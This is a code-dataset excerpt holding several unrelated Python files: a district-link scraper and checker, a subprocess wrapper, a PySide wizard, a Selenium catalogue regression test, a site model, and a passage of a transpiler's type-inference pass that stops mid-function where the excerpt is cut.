max_stars_repo_path
stringlengths 3
269
| max_stars_repo_name
stringlengths 4
119
| max_stars_count
int64 0
191k
| id
stringlengths 1
7
| content
stringlengths 6
1.05M
| score
float64 0.23
5.13
| int_score
int64 0
5
|
|---|---|---|---|---|---|---|
api/linkCreationHelpers.py
|
healthIMIS/aha-kompass
| 2
|
12777951
|
<reponame>healthIMIS/aha-kompass
#!/usr/bin/env python3
# Corona-Info-App
#
# © 2020 <NAME>.
# Include utilities
import urllib
import json
from sqlalchemy import or_
import bs4
import visvalingamwyatt as vw
# Include db connection
from main import db, api
# Include models
from models.districts import districts, updateDistrictIncidence, createRegionIfNotExists
from models.measures import sources, regionHasGroup, display, createSource
from utils.measure_utils import createDefaultGroup
from sqlalchemy.orm.exc import NoResultFound, MultipleResultsFound
import requests
#For multithreading
import multiprocessing
import threading
from queue import Queue
def part1():
with open('landkreise.json') as f:
data = json.load(f)
result = {
"ok" : [],
"err" : []
}
for d in data:
region_id = createRegionIfNotExists(d["Bundesland"]).id
print(region_id)
html_soup = bs4.BeautifulSoup(d["Regionale Einschränkungen"], 'html.parser')
for l in html_soup.findAll('a'):
category = None
name = None
if l.text[0:10] == "Landkreis ":
category = "Landkreis"
name = l.text[10:]
elif l.text[-10:] == " Landkreis":
category = "Landkreis"
name = l.text[:-11]
elif l.text[0:11] == "Stadtkreis ":
category = "Stadtkreis"
name = l.text[11:]
elif l.text[0:17] == "Kreisfreie Stadt ":
category = "Kreisfreie Stadt"
name = l.text[17:]
elif l.text[-17:] == " kreisfreie Stadt":
category = "Kreisfreie Stadt"
name = l.text[:-18]
elif l.text[0:6] == "Stadt ":
category = "Kreisfreie Stadt"
name = l.text[6:]
elif l.text[0:6] == "Kreis ":
category = "Landkreis"
name = l.text[6:]
elif not "RKI" in l.text:
name = l.text
if name != None:
try:
if category != None:
if category == "Landkreis":
d = districts.query.filter(districts.name.like("%{}%".format(name)), districts.region_id == region_id, or_(districts.category == "Landkreis", districts.category == "Kreis")).one()
else:
d = districts.query.filter(districts.name.like("%{}%".format(name)), districts.region_id == region_id, districts.category == category).one()
else:
d = districts.query.filter(districts.name.like("%{}%".format(name)), districts.region_id == region_id).one()
result["ok"].append({"id": d.id, "link": l["href"], "comment": l.text})
except NoResultFound:
result["err"].append({"id": None, "link": l["href"], "comment": l.text})
except MultipleResultsFound:
result["err"].append({"id": None, "link": l["href"], "comment": l.text})
with open('districtlinks.json', 'w') as json_file:
json.dump(result, json_file)
def part2():
with open('links.json') as f:
data = json.load(f)
abgedeckt = {}
for d in data:
abgedeckt[d["id"]] = d
result = {
"ok" : data,
"missing" : []
}
for d in districts.query.all():
if d.id not in abgedeckt:
result["missing"].append({"id": d.id, "link": "", "comment": d.name_de})
print(d.id)
#with open('districtlinks2.json', 'w') as json_file:
# json.dump(result, json_file)
def part3():
with open('links.json') as f:
data = json.load(f)
jobQueue = Queue()
resultQueue = Queue()
for d in data:
jobQueue.put(d)
for i in range(multiprocessing.cpu_count()):
worker = threading.Thread(target=part3_helper, args=(jobQueue,resultQueue))
worker.start()
jobQueue.join()
print("DONE")
result = []
for q_item in resultQueue.queue:
result.append(q_item)
with open('unsuccessfull.json', 'w') as json_file:
json.dump(result, json_file)
def part3_helper(q, resultQueue):
while not q.empty():
job = q.get()
try:
headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0"}
r = requests.get(job["link"], timeout=(5, 10), headers=headers)
if r.status_code != 200:
res = job
res["statusCode"] = r.status_code,
print(res)
resultQueue.put(res)
except requests.exceptions.RequestException as e: # This is the correct syntax
res = job
res["exception"] = str(e),
print(res)
resultQueue.put(res)
q.task_done()
#part3()
import os
def tiles():
from pathlib import Path
jobQueue = Queue()
files = list(Path("../app/src/static/tiles").rglob("*.png"))
for f in files:
jobQueue.put(str(f))
for i in range(multiprocessing.cpu_count()):
worker = threading.Thread(target=tile_helper, args=(jobQueue,))
worker.start()
jobQueue.join()
print("DONE")
def tile_helper(q):
while not q.empty():
job = q.get()
try:
os.system("convert "+job+" -quality 85 "+job[:-3]+"jpg")
os.system("rm "+job)
except: # This is the correct syntax
print("Something went wrong:", job)
q.task_done()
tiles()
| 2.15625
| 2
|
lib/utils.py
|
gmelillo/registry
| 0
|
12777952
|
<gh_stars>0
import threading
import logging
import os
import signal
import subprocess
import shlex
class Command(object):
def __init__(self, cmd, **kwargs):
self.cmd = cmd
self.process = None
self.log = logging.getLogger(f'{__name__}.{self.__class__.__name__}')
self.timeout = kwargs.get('timeout', None)
self.graceful_period = kwargs.get('graceful_period', 30)
def run(self):
def target():
try:
self.process = subprocess.Popen(shlex.split(self.cmd), shell=False, env=os.environ.copy(),
preexec_fn=os.setsid, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
except Exception as e:
self.log.error(f'unable to execute the command: {e.__str__()}')
return
while True:
output = self.process.stdout.readline()
if output:
self.log.info(output.strip())
if self.process.poll() is not None:
break
return self.process.poll()
self.log.debug(f'Executing command {shlex.split(self.cmd)[0]} with {self.timeout}s of timeout and {self.graceful_period}s of grace period')
thread = threading.Thread(target=target)
thread.start()
thread.join(self.timeout)
if thread.is_alive():
os.killpg(self.process.pid, signal.SIGTERM)
thread.join(self.graceful_period)
if thread.is_alive():
os.killpg(self.process.pid, signal.SIGKILL)
thread.join()
self.log.debug(f'Ececution of command {shlex.split(self.cmd)[0]} terminated')
| 2.375
| 2
|
futura_ui/app/ui/wizards/regionalisation_wizard.py
|
pjamesjoyce/futura
| 6
|
12777953
|
from PySide2 import QtWidgets, QtCore
import os
from ..utils import load_ui_file
from ..widgets.filter import FilterListerWidget, parse_filter_widget
from ..widgets.geo import LocationSelectorWidget
from ...utils import findMainWindow
from futura.utils import create_filter_from_description
from futura import w
from futura.proxy import WurstProcess
class RegionalisationWizard(QtWidgets.QWizard):
def __init__(self, parent=None):
super(RegionalisationWizard, self).__init__(parent)
ui_path = 'regionalisation_wizard.ui'
ui_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), ui_path)
load_ui_file(ui_path, self)
self.filter_widget = FilterListerWidget()
self.filterLayout.addWidget(self.filter_widget)
self.location_widget = LocationSelectorWidget()
self.locationLayout.addWidget(self.location_widget)
self.currentIdChanged.connect(self.page_change)
def page_change(self, page_id):
if page_id == 1:
self.restrict_locations()
elif page_id == 2:
self.confirm_setup()
def confirm_setup(self):
print("This is the last page")
this_filter = create_filter_from_description(parse_filter_widget(self.filter_widget))
db = findMainWindow().loader.database.db
this_item_set = [WurstProcess(x) for x in w.get_many(db, *this_filter)]
#this_item = w.get_one(db, *this_filter)
print(this_item_set)
item_string = ""
for n, this_item in enumerate(this_item_set):
item_string += "{} ({}) [{}]".format(this_item['name'], this_item['unit'], this_item['location'])
if n != len(this_item_set):
item_string += "\n"
self.processLabel.setText(item_string)
if len(this_item_set) > 1:
self.processDescriptionLabel.setText('Base processes: ')
else:
self.processDescriptionLabel.setText('Base process: ')
location_list = ", ".join([x['display'] for x in self.location_widget.checked_items])
self.locationLabel.setText(location_list)
def restrict_locations(self):
base_filter = parse_filter_widget(self.filter_widget)
no_location_filter = [x for x in base_filter if x['args'][0] != 'location']
this_filter = create_filter_from_description(base_filter)
no_location = create_filter_from_description(no_location_filter)
db = findMainWindow().loader.database.db
this_item = w.get_one(db, *this_filter)
item_location = this_item['location']
other_items = w.get_many(db, *no_location)
other_locations = [x['location'] for x in other_items]
other_locations = [x for x in other_locations if x != 'RoW']
locations = list(set(other_locations + [item_location]))
print(locations)
self.location_widget.find_and_disable(locations)
| 2.125
| 2
|
test_case_4_3.py
|
Alekseybykov126/autotesting
| 0
|
12777954
|
<filename>test_case_4_3.py
from Regress_web.page import *
time.sleep(1)
def case_4_3(self, full_screen):
self.page.loger('\n Запуск Тест кейс № 4_3 tvweb_new-4_3: Проверка работоспособности кнопок "Смотреть все" с главной страницы \n')
time.sleep(2)
## Бесплатные фильмы
self.page.loger('Шаг 1. Проверка наличия Покупки и Подписки в списке бесплатных фильмов')
#self.page.waitForElementVisible('.//div[@id="compilation-216"]', 10)
target = self.driver.find_element_by_xpath('.//div[@id="compilation-12"]')
target.location_once_scrolled_into_view
self.page.waitForElementVisible('.//div[@id="compilation-216"]', 10) # Контейнер с фильмами
status_txt = str(self.result.find_link("div", "compilation-216")) # Исключает Покупку и Подписку из списка фильмов
assert('Покупка') not in status_txt
assert('Подписка') not in status_txt
self.driver.find_elements_by_xpath('.//button[@data-related-compilation-id="216"]')[1].click() # Клик стрелки прокрутки вправо
time.sleep(2)
self.page.waitForElementVisible('.//div[@id="compilation-216"]', 10)
status_txt = str(self.result.find_link("div", "compilation-216"))
assert('Покупка') not in status_txt
assert('Подписка') not in status_txt
self.driver.find_element_by_xpath('.//button[@data-related-compilation-id="216"]').click() # Клик стрелки прокрутки влево
time.sleep(1)
self.driver.find_element_by_xpath('.//button[@data-related-compilation-id="216"]').click() # Клик стрелки прокрутки влево
self.page.waitForElementVisible('.//div[@id="compilation-216"]', 10)
status_txt = str(self.result.find_link("div", "compilation-216"))
assert('Покупка') not in status_txt
assert('Подписка') not in status_txt
self.driver.find_element_by_xpath('.//button[@data-related-compilation-id="216"]').click() # Клик стрелки прокрутки влево
self.page.waitForElementVisible('.//div[@id="compilation-216"]', 10)
status_txt = str(self.result.find_link("div", "compilation-216"))
assert('Покупка') not in status_txt
assert('Подписка') not in status_txt
self.page.loger('В разделе "Бесплатные фильмы" отсутствуют платные и фильмы по подписке')
time.sleep(2)
self.page.loger('Шаг 2. Проверка перехода в раздел "Бесплатные фильмы" через кнопку "Смотреть все"')
self.driver.find_element_by_xpath('.//a[@href="/catalog/besplatnye-filmy/"]').click() # Клик на "Смотреть все"
time.sleep(3)
self.page.waitForElementVisible('.//h1[@class="page__heading superheading-1"]', 10)
head_txt = str(self.result.find_link("h1", "page__heading superheading-1"))
assert('Бесплатные фильмы') in head_txt
self.page.loger('Переход в раздел "Бесплатные фильмы" подтвержден')
self.driver.back()
time.sleep(3)
### Новинки
target = self.driver.find_element_by_xpath('.//div[@id="compilation-60"]')
target.location_once_scrolled_into_view
self.page.loger('Шаг 3. Проверка раздела "Новинки"')
self.driver.find_element_by_xpath('.//a[@href="/catalog/novinki/"]').click()
time.sleep(3)
self.page.waitForElementVisible('.//h1[@class="page__heading superheading-1"]', 10)
head_txt = str(self.result.find_link("h1", "page__heading superheading-1"))
assert('Новинки') in head_txt
self.page.loger('Переход в раздел "Новинки" подтвержден')
self.driver.back()
time.sleep(3)
## Фильмы на Хэллоуин____________!
self.page.loger('Шаг 4. Проверка раздела "Фильмы на Хэллоуин"')
target = self.driver.find_element_by_xpath('.//div[@id="compilation-suggestions-base"]')
target.location_once_scrolled_into_view
self.driver.find_element_by_xpath('.//a[@href="/catalog/helloween/"]').click()
time.sleep(3)
self.page.waitForElementVisible('.//h1[@class="page__heading superheading-1"]', 10)
head_txt = str(self.result.find_link("h1", "page__heading superheading-1"))
assert('Фильмы на Хэллоуин') in head_txt
self.page.loger('Переход в раздел "Фильмы на Хэллоуин" подтвержден')
self.driver.back()
time.sleep(3)
## Смотреть по подписке
target = self.driver.find_element_by_xpath('.//div[@id="compilation-216"]')
target.location_once_scrolled_into_view
self.page.waitForElementVisible('.//div[@id="compilation-60"]', 10)
target = self.driver.find_element_by_xpath('.//div[@id="compilation-60"]') # скролл до подборки на Хэллоуин
target.location_once_scrolled_into_view # скролл
time.sleep(2)
self.page.waitForElementVisible('.//div[@id="compilation-260"]', 10) # Контейнер с фильмами
status_txt = str(self.result.find_link("div", "compilation-260")) # Исключает Покупку и Бесплатно из списка фильмов
assert('Покупка') not in status_txt
assert('Бесплатно') not in status_txt
self.driver.find_elements_by_xpath('.//button[@data-related-compilation-id="260"]')[1].click() # Клик стрелки прокрутки вправо
time.sleep(2)
self.page.waitForElementVisible('.//div[@id="compilation-260"]', 10)
status_txt = str(self.result.find_link("div", "compilation-260"))
assert('Покупка') not in status_txt
assert('Бесплатно') not in status_txt
self.driver.find_element_by_xpath('.//button[@data-related-compilation-id="260"]').click() # Клик стрелки прокрутки влево
time.sleep(1)
self.driver.find_element_by_xpath('.//button[@data-related-compilation-id="260"]').click() # Клик стрелки прокрутки влево
self.page.waitForElementVisible('.//div[@id="compilation-216"]', 10)
status_txt = str(self.result.find_link("div", "compilation-216"))
assert('Покупка') not in status_txt
assert('Бесплатно') not in status_txt
self.driver.find_element_by_xpath('.//button[@data-related-compilation-id="260"]').click() # Клик стрелки прокрутки влево
self.page.waitForElementVisible('.//div[@id="compilation-216"]', 10)
status_txt = str(self.result.find_link("div", "compilation-216"))
assert('Покупка') not in status_txt
assert('Бесплатно') not in status_txt
self.page.loger('В разделе "Смотреть по подписке" отсутствуют платные и бесплатные фильмы')
time.sleep(2)
self.page.loger('Шаг 5. Проверка перехода в раздел "Смотреть по подписке" через кнопку "Смотреть все"')
self.driver.find_element_by_xpath('.//a[@href="/catalog/smotret-po-podpiske/"]').click() # Клик на "Смотреть все"
time.sleep(3)
self.page.waitForElementVisible('.//h1[@class="page__heading superheading-1"]', 10)
head_txt = str(self.result.find_link("h1", "page__heading superheading-1"))
assert('Смотреть по подписке') in head_txt
self.page.loger('Переход в раздел "Смотреть по подписке" подтвержден')
self.driver.back()
time.sleep(3)
## Лучшие фильмы киностудии Paramount
self.page.waitForElementVisible('.//div[@id="compilation-260"]', 10)
target = self.driver.find_element_by_xpath('.//div[@id="compilation-260"]') # скролл до подборки Смотреть по подписке
target.location_once_scrolled_into_view # скролл
time.sleep(2)
self.page.loger('Шаг 6. Проверка раздела "Лучшие фильмы киностудии Paramount"')
self.driver.find_element_by_xpath('.//a[@href="/catalog/luchshie-filmy-kinostudii-paramount/"]').click()
time.sleep(3)
self.page.waitForElementVisible('.//h1[@class="page__heading superheading-1"]', 10)
head_txt = str(self.result.find_link("h1", "page__heading superheading-1"))
assert('Лучшие фильмы киностудии Paramount') in head_txt
self.page.loger('Переход в раздел "Лучшие фильмы киностудии Paramount" подтвержден')
self.driver.back()
time.sleep(3)
## Фильмы ужасов
self.page.waitForElementVisible('.//div[@id="compilation-228"]', 10)
target = self.driver.find_element_by_xpath('.//div[@id="compilation-228"]') # скролл до подборки Смотреть по подписке
target.location_once_scrolled_into_view # скролл
time.sleep(2)
self.page.loger('Шаг 7. Проверка раздела "Фильмы ужасов"')
self.driver.find_element_by_xpath('.//a[@href="/catalog/filmy-uzhasov/"]').click()
time.sleep(3)
self.page.waitForElementVisible('.//h1[@class="page__heading superheading-1"]', 10)
head_txt = str(self.result.find_link("h1", "page__heading superheading-1"))
assert('Фильмы ужасов') in head_txt
self.page.loger('Переход в раздел "Фильмы ужасов" подтвержден')
time.sleep(2)
self.driver.find_element_by_xpath('.//button[@class="rollup__toggle js-rollup-toggle"]').click() # Клик на развернуть
self.page.waitForElementVisible('.//div[@class="page__description seo-info rollup js-rollup rollup_overflow rollup_open"]', 10)
time.sleep(1)
self.driver.find_element_by_xpath('.//button[@class="rollup__toggle js-rollup-toggle"]').click() # Клик на свернуть
self.page.waitForElementVisible('.//div[@class="page__description seo-info rollup js-rollup rollup_overflow"]', 10)
time.sleep(1)
self.page.loger('Кнопка Свернуть/Развернуть работает')
self.driver.back()
time.sleep(3)
### MoviesChain by tvzavr
self.page.waitForElementVisible('.//div[@id="compilation-23"]', 10)
target = self.driver.find_element_by_xpath('.//div[@id="compilation-23"]') # скролл до подборки
target.location_once_scrolled_into_view # скролл
time.sleep(2)
self.page.loger('Шаг 8. Проверка раздела "MoviesChain by tvzavr"')
self.driver.find_element_by_xpath('.//a[@href="/catalog/movieschain/"]').click()
time.sleep(3)
self.page.waitForElementVisible('.//h1[@class="page__heading superheading-1"]', 10)
head_txt = str(self.result.find_link("h1", "page__heading superheading-1"))
assert('MoviesChain by tvzavr') in head_txt
self.page.loger('Переход в раздел "MoviesChain by tvzavr" подтвержден')
self.driver.back()
time.sleep(3)
### Современные мультфильмы
self.page.waitForElementVisible('.//div[@id="compilation-230"]', 10)
target = self.driver.find_element_by_xpath('.//div[@id="compilation-230"]') # скролл до подборки
target.location_once_scrolled_into_view # скролл
time.sleep(2)
self.page.loger('Шаг 9. Проверка раздела "Современные мультфильмы"')
self.driver.find_element_by_xpath('.//a[@href="/catalog/modern-cartoons/"]').click()
time.sleep(3)
self.page.waitForElementVisible('.//h1[@class="page__heading superheading-1"]', 10)
head_txt = str(self.result.find_link("h1", "page__heading superheading-1"))
assert('Современные мультфильмы') in head_txt
self.page.loger('Переход в раздел "Современные мультфильмы" подтвержден')
time.sleep(2)
self.driver.find_element_by_xpath('.//button[@class="rollup__toggle js-rollup-toggle"]').click() # Клик на развернуть
self.page.waitForElementVisible('.//div[@class="page__description seo-info rollup js-rollup rollup_overflow rollup_open"]', 10)
time.sleep(1)
self.driver.find_element_by_xpath('.//button[@class="rollup__toggle js-rollup-toggle"]').click() # Клик на свернуть
self.page.waitForElementVisible('.//div[@class="page__description seo-info rollup js-rollup rollup_overflow"]', 10)
time.sleep(1)
self.page.loger('Кнопка Свернуть/Развернуть работает')
self.driver.back()
time.sleep(3)
## Лучшие ремейки
self.page.waitForElementVisible('.//div[@id="compilation-6"]', 10)
target = self.driver.find_element_by_xpath('.//div[@id="compilation-6"]') # скролл до подборки Смотреть по подписке
target.location_once_scrolled_into_view # скролл
time.sleep(2)
self.page.loger('Шаг 10. Проверка раздела "Лучшие ремейки"')
self.driver.find_element_by_xpath('.//a[@href="/catalog/luchshie-remeyki/"]').click()
time.sleep(3)
self.page.waitForElementVisible('.//h1[@class="page__heading superheading-1"]', 10)
head_txt = str(self.result.find_link("h1", "page__heading superheading-1"))
assert('Лучшие ремейки') in head_txt
self.page.loger('Переход в раздел "Лучшие ремейки" подтвержден')
self.driver.back()
time.sleep(3)
## Молодёжные комедии
self.page.waitForElementVisible('.//div[@id="compilation-279"]', 10)
target = self.driver.find_element_by_xpath('.//div[@id="compilation-279"]') # скролл до подборки
target.location_once_scrolled_into_view # скролл
time.sleep(2)
self.page.loger('Шаг 11. Проверка раздела "Молодёжные комедии"')
self.driver.find_element_by_xpath('.//a[@href="/catalog/molodezhnye-komedii/"]').click()
time.sleep(3)
self.page.waitForElementVisible('.//h1[@class="page__heading superheading-1"]', 10)
head_txt = str(self.result.find_link("h1", "page__heading superheading-1"))
assert('Молодёжные комедии') in head_txt
self.page.loger('Переход в раздел "Молодёжные комедии" подтвержден')
time.sleep(2)
self.driver.find_element_by_xpath('.//button[@class="rollup__toggle js-rollup-toggle"]').click() # Клик на развернуть
self.page.waitForElementVisible('.//div[@class="page__description seo-info rollup js-rollup rollup_overflow rollup_open"]', 10)
time.sleep(1)
self.driver.find_element_by_xpath('.//button[@class="rollup__toggle js-rollup-toggle"]').click() # Клик на свернуть
self.page.waitForElementVisible('.//div[@class="page__description seo-info rollup js-rollup rollup_overflow"]', 10)
time.sleep(1)
self.page.loger('Кнопка Свернуть/Развернуть работает')
self.driver.back()
time.sleep(3)
## Французские фильмы
self.page.waitForElementVisible('.//div[@id="compilation-139"]', 10)
target = self.driver.find_element_by_xpath('.//div[@id="compilation-139"]') # скролл до подборки
target.location_once_scrolled_into_view # скролл
time.sleep(2)
self.page.loger('Шаг 12. Проверка раздела "Французские фильмы"')
self.driver.find_element_by_xpath('.//a[@href="/catalog/frantsuzskie-filmy/"]').click()
time.sleep(3)
self.page.waitForElementVisible('.//h1[@class="page__heading superheading-1"]', 10)
head_txt = str(self.result.find_link("h1", "page__heading superheading-1"))
assert('Французские фильмы') in head_txt
self.page.loger('Переход в раздел "Французские фильмы" подтвержден')
time.sleep(2)
self.driver.find_element_by_xpath('.//button[@class="rollup__toggle js-rollup-toggle"]').click() # Клик на развернуть
self.page.waitForElementVisible('.//div[@class="page__description seo-info rollup js-rollup rollup_overflow rollup_open"]', 10)
time.sleep(1)
self.driver.find_element_by_xpath('.//button[@class="rollup__toggle js-rollup-toggle"]').click() # Клик на свернуть
self.page.waitForElementVisible('.//div[@class="page__description seo-info rollup js-rollup rollup_overflow"]', 10)
time.sleep(1)
self.page.loger('Кнопка Свернуть/Развернуть работает')
self.driver.back()
time.sleep(3)
## Психологические триллеры
self.page.waitForElementVisible('.//div[@id="compilation-18"]', 10)
target = self.driver.find_element_by_xpath('.//div[@id="compilation-18"]') # скролл до подборки Смотреть по подписке
target.location_once_scrolled_into_view # скролл
time.sleep(2)
self.page.loger('Шаг 13. Проверка раздела "Психологические триллеры"')
self.driver.find_element_by_xpath('.//a[@href="/catalog/psihologicheskie-trillery/"]').click()
time.sleep(3)
self.page.waitForElementVisible('.//h1[@class="page__heading superheading-1"]', 10)
head_txt = str(self.result.find_link("h1", "page__heading superheading-1"))
assert('Психологические триллеры') in head_txt
self.page.loger('Переход в раздел "Психологические триллеры" подтвержден')
self.driver.back()
time.sleep(3)
### Советские мультфильмы
self.page.waitForElementVisible('.//div[@id="compilation-91"]', 10)
target = self.driver.find_element_by_xpath('.//div[@id="compilation-91"]') # скролл до подборки
target.location_once_scrolled_into_view # скролл
time.sleep(2)
self.page.loger('Шаг 14. Проверка раздела "Советские мультфильмы"')
self.driver.find_element_by_xpath('.//a[@href="/catalog/sovetskie-multfilmy/"]').click()
time.sleep(3)
self.page.waitForElementVisible('.//h1[@class="page__heading superheading-1"]', 10)
head_txt = str(self.result.find_link("h1", "page__heading superheading-1"))
assert('Советские мультфильмы') in head_txt
self.page.loger('Переход в раздел "Советские мультфильмы" подтвержден')
time.sleep(2)
self.driver.find_element_by_xpath('.//button[@class="rollup__toggle js-rollup-toggle"]').click() # Клик на развернуть
self.page.waitForElementVisible('.//div[@class="page__description seo-info rollup js-rollup rollup_overflow rollup_open"]', 10)
time.sleep(1)
self.driver.find_element_by_xpath('.//button[@class="rollup__toggle js-rollup-toggle"]').click() # Клик на свернуть
self.page.waitForElementVisible('.//div[@class="page__description seo-info rollup js-rollup rollup_overflow"]', 10)
time.sleep(1)
self.page.loger('Кнопка Свернуть/Развернуть работает')
self.driver.back()
time.sleep(3)
### Высокобюджетные фильмы
self.page.waitForElementVisible('.//div[@id="compilation-17"]', 10)
target = self.driver.find_element_by_xpath('.//div[@id="compilation-17"]') # скролл до подборки Смотреть по подписке
target.location_once_scrolled_into_view # скролл
time.sleep(2)
self.page.loger('Шаг 15. Проверка раздела "Высокобюджетные фильмы"')
self.driver.find_element_by_xpath('.//a[@href="/catalog/vysokobyudzhetnye-filmy/"]').click()
time.sleep(3)
self.page.waitForElementVisible('.//h1[@class="page__heading superheading-1"]', 10)
head_txt = str(self.result.find_link("h1", "page__heading superheading-1"))
assert('Высокобюджетные фильмы') in head_txt
self.page.loger('Переход в раздел "Высокобюджетные фильмы" подтвержден')
self.driver.back()
time.sleep(3)
### Фильмы из Топ-250 КиноПоиска
self.page.waitForElementVisible('.//div[@id="compilation-41"]', 10)
target = self.driver.find_element_by_xpath('.//div[@id="compilation-41"]') # скролл до подборки Смотреть по подписке
target.location_once_scrolled_into_view # скролл
time.sleep(2)
self.page.loger('Шаг 16. Проверка раздела "Фильмы из Топ-250 КиноПоиска"')
self.driver.find_element_by_xpath('.//a[@href="/catalog/filmy-iz-top-250-kinopoiska/"]').click()
time.sleep(3)
self.page.waitForElementVisible('.//h1[@class="page__heading superheading-1"]', 10)
head_txt = str(self.result.find_link("h1", "page__heading superheading-1"))
assert('Фильмы из Топ-250 КиноПоиска') in head_txt
self.page.loger('Переход в раздел "Фильмы из Топ-250 КиноПоиска" подтвержден')
self.driver.back()
time.sleep(3)
### Фильмы, основанные на реальных событиях
self.page.waitForElementVisible('.//div[@id="compilation-48"]', 10)
target = self.driver.find_element_by_xpath('.//div[@id="compilation-48"]') # скролл до подборки Смотреть по подписке
target.location_once_scrolled_into_view # скролл
time.sleep(2)
self.page.loger('Шаг 17. Проверка раздела "Фильмы, основанные на реальных событиях"')
self.driver.find_element_by_xpath('.//a[@href="/catalog/filmy-osnovannye-na-realnyh-sobytiyah/"]').click()
time.sleep(3)
self.page.waitForElementVisible('.//h1[@class="page__heading superheading-1"]', 10)
head_txt = str(self.result.find_link("h1", "page__heading superheading-1"))
assert('Фильмы, основанные на реальных событиях') in head_txt
self.page.loger('Переход в раздел "Фильмы, основанные на реальных событиях" подтвержден')
self.driver.back()
time.sleep(3)
### Биографические фильмы
self.page.waitForElementVisible('.//div[@id="compilation-26"]', 10)
target = self.driver.find_element_by_xpath('.//div[@id="compilation-26"]') # скролл до подборки
target.location_once_scrolled_into_view # скролл
time.sleep(2)
self.page.loger('Шаг 18. Проверка раздела "Биографические фильмы"')
self.driver.find_element_by_xpath('.//a[@href="/catalog/biograficheskie-filmy/"]').click()
time.sleep(3)
self.page.waitForElementVisible('.//h1[@class="page__heading superheading-1"]', 10)
head_txt = str(self.result.find_link("h1", "page__heading superheading-1"))
assert('Биографические фильмы') in head_txt
self.page.loger('Переход в раздел "Биографические фильмы" подтвержден')
time.sleep(2)
self.driver.find_element_by_xpath('.//button[@class="rollup__toggle js-rollup-toggle"]').click() # Клик на развернуть
self.page.waitForElementVisible('.//div[@class="page__description seo-info rollup js-rollup rollup_overflow rollup_open"]', 10)
time.sleep(1)
self.driver.find_element_by_xpath('.//button[@class="rollup__toggle js-rollup-toggle"]').click() # Клик на свернуть
self.page.waitForElementVisible('.//div[@class="page__description seo-info rollup js-rollup rollup_overflow"]', 10)
time.sleep(1)
self.page.loger('Кнопка Свернуть/Развернуть работает')
self.driver.back()
time.sleep(3)
self.driver.quit()
| 2.171875
| 2
|
stacksites/sites/models.py
|
jasonvfang/StackSites
| 0
|
12777955
|
<gh_stars>0
# -*- coding: utf-8 -*-
from datetime import datetime
from stacksites.database import db, CRUDMixin
from .utils import upload_index_for_new_site, make_s3_path, get_files_data, delete_site_from_s3, transfer_landing_demo
class Site(CRUDMixin, db.Model):
__tablename__ = 'site'
name = db.Column(db.String(64), nullable=False)
created_at = db.Column(db.DateTime(), nullable=False)
updated_at = db.Column(db.DateTime(), nullable=False)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
def __init__(self, name, user, temp_file_id=None):
self.name = name
self.created_at = datetime.utcnow()
self.updated_at = datetime.utcnow()
self.user = user
if temp_file_id is not None:
transfer_landing_demo(temp_file_id, user.username, name)
else:
upload_index_for_new_site(user.username, name)
def update_time(self):
self.updated_at = datetime.utcnow()
self.save()
def get_files(self, folder_key=None):
return get_files_data(self.user.username, self.name, folder_key)
def delete_site(self):
delete_site_from_s3(self.user.username, self.name)
self.delete()
def __repr__(self):
username = self.user or ""
return "<Site ({0}, user: {1})>".format(self.name, username)
| 2.296875
| 2
|
mys/transpiler/infer_types_transformer.py
|
eerimoq/sython
| 0
|
12777956
|
from ..parser import ast
from .utils import BUILTIN_TYPES
from .utils import CompileError
from .utils import is_upper_snake_case
class Placeholder(ast.AST):
pass
class TypeVisitor(ast.NodeVisitor):
def __init__(self, context):
self.context = context
def visit_Constant(self, node):
if isinstance(node.value, int):
return ast.Name(id='i64')
elif isinstance(node.value, str):
return ast.Name(id='string')
return None
def visit_Call(self, node):
if isinstance(node.func, ast.Name):
function_name = node.func.id
if function_name in BUILTIN_TYPES:
return ast.Name(id=function_name)
else:
functions = self.context.module_definitions.functions.get(
function_name)
if functions is not None:
returns = functions[0].node.returns
if returns is not None:
return returns
return None
class Context:
def __init__(self, module_definitions, definitions):
self.module_definitions = module_definitions
self.definitions = definitions
self.variables = {}
self.incomplete_variables = {}
self.stack = [[]]
def push(self):
self.stack.append([])
def pop(self):
for name in self.stack.pop():
self.variables.pop(name)
def define_variable(self, name, mys_type):
self.variables[name] = mys_type
self.stack[-1].append(name)
def define_incomplete_variable(self, name, node, ann_node):
self.incomplete_variables[name] = (node, ann_node)
self.stack[-1].append(name)
class InferTypesTransformer(ast.NodeTransformer):
"""Traverses the AST and replaces `ast.Assign` with `ast.AnnAssign`
where types are defined.
"""
def __init__(self, module_definitions, definitions):
self.module_definitions = module_definitions
self.definitions = definitions
self.context = None
self.returns = None
def visit_AnnAssign(self, node):
if self.context is None:
return node
if not isinstance(node.target, ast.Name):
return node
variable_name = node.target.id
if is_upper_snake_case(variable_name):
return node
if variable_name in self.context.variables:
return node
if variable_name in self.context.incomplete_variables:
return node
self.context.define_variable(variable_name, None)
return node
def visit_Assign(self, node):
if self.context is None:
return node
if len(node.targets) != 1:
return node
if not isinstance(node.targets[0], ast.Name):
return node
variable_name = node.targets[0].id
if is_upper_snake_case(variable_name):
return node
if variable_name in self.context.variables:
return node
if variable_name in self.context.incomplete_variables:
return node
ann_node = None
if isinstance(node.value, ast.List):
if len(node.value.elts) == 0:
ann_node = ast.AnnAssign(target=ast.Name(id=variable_name),
annotation=ast.List(elts=[Placeholder()]),
value=node.value)
elif isinstance(node.value, ast.Dict):
if len(node.value.keys) == 0:
# Dict or set.
ann_node = ast.AnnAssign(target=ast.Name(id=variable_name),
annotation=Placeholder(),
value=node.value)
elif isinstance(node.value, ast.Constant):
if node.value.value is None:
ann_node = ast.AnnAssign(target=ast.Name(id=variable_name),
annotation=Placeholder(),
value=node.value)
if ann_node is not None:
self.context.define_incomplete_variable(variable_name, node, ann_node)
node = ann_node
else:
self.context.define_variable(variable_name, None)
return node
def visit_Return(self, node):
if not isinstance(node.value, ast.Name):
return node
name = node.value.id
if name in self.context.incomplete_variables:
ann_node = self.context.incomplete_variables.pop(name)[1]
ann_node.annotation = self.returns
self.context.define_variable(name, None)
return node
def visit_For(self, node):
ForLoopTargetVisitor(self.context).visit(node.target)
for i, item in enumerate(node.body):
node.body[i] = self.visit(item)
return node
def visit_Call(self, node):
if isinstance(node.func, ast.Attribute):
if isinstance(node.func.value, ast.Name):
name = node.func.value.id
if name in self.context.incomplete_variables:
ann_node = self.context.incomplete_variables[name][1]
